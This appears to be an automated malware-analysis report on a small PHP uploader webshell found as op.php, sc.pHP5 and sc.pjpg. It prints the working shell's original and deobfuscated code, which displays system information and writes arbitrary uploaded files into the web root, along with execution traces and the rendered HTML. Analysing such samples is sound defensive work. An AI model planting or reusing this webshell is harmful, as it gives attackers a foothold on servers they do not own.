PHP Malware Analysis
op.php, sc.pHP5, sc.pjpg
md5: 8406b59c6e95f14a9570ae4772dbcc29
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo "<pre><font size='4' color='black'>" . php_uname() . "</font></pre>";
echo "<form method='post' enctype='multipart/form-data'>\r <input type='file' name='file'>\r <input type='submit' name='upload' value='Upload'>\r </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "Sukses ~> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "Gagal Upload Di Document Root.";
}
} else {
if (@copy($_FILES['file']['tmp_name'], $files)) {
echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
} else {
echo "Gagal";
}
}
}
?>
</body>
Execution traces
data/traces/8406b59c6e95f14a9570ae4772dbcc29_trace-1676241747.8661.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:42:53.763950]
1 0 1 0.000310 393464
1 3 0 0.000394 398824 {main} 1 /var/www/html/uploads/op.php 0 0
2 4 0 0.000413 398824 php_uname 0 /var/www/html/uploads/op.php 3 0
2 4 1 0.000429 398936
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/op.php 8 $root = '/var/www/html'
1 A /var/www/html/uploads/op.php 9 $files = NULL
1 A /var/www/html/uploads/op.php 10 $dest = '/var/www/html/'
1 3 1 0.000512 398864
0.000542 314336
TRACE END [2023-02-12 20:42:53.764225]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:20:51.956423]
1 0 1 0.000148 393512
1 3 0 0.000226 398872 {main} 1 /var/www/html/uploads/sc.pHP5 0 0
2 4 0 0.000243 398872 php_uname 0 /var/www/html/uploads/sc.pHP5 3 0
2 4 1 0.000258 398984
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/sc.pHP5 8 $root = '/var/www/html'
1 A /var/www/html/uploads/sc.pHP5 9 $files = NULL
1 A /var/www/html/uploads/sc.pHP5 10 $dest = '/var/www/html/'
1 3 1 0.000337 398912
0.000363 314360
TRACE END [2023-02-13 00:20:51.956665]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:23.908879]
1 0 1 0.000253 393512
1 3 0 0.000336 398872 {main} 1 /var/www/html/uploads/sc.pjpg 0 0
2 4 0 0.000354 398872 php_uname 0 /var/www/html/uploads/sc.pjpg 3 0
2 4 1 0.000369 398984
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/sc.pjpg 8 $root = '/var/www/html'
1 A /var/www/html/uploads/sc.pjpg 9 $files = NULL
1 A /var/www/html/uploads/sc.pjpg 10 $dest = '/var/www/html/'
1 3 1 0.000442 398912
0.000469 314360
TRACE END [2023-02-13 00:27:23.909229]
Generated HTML code
<html><head></head><body><pre><font size="4" color="black">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font></pre><form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="upload" value="Upload">
</form>
</body></html>Original PHP code
<?php
echo "<pre><font size='4' color='black'>".php_uname()."</font></pre>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='file'>
<input type='submit' name='upload' value='Upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Sukses ~> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "Gagal Upload Di Document Root.";
}
} else {
if(@copy($_FILES['file']['tmp_name'], $files)) {
echo "Sukses Upload <b>$files</b> Di Folder Ini";
} else {
echo "Gagal";
}
}
}
?>
</body>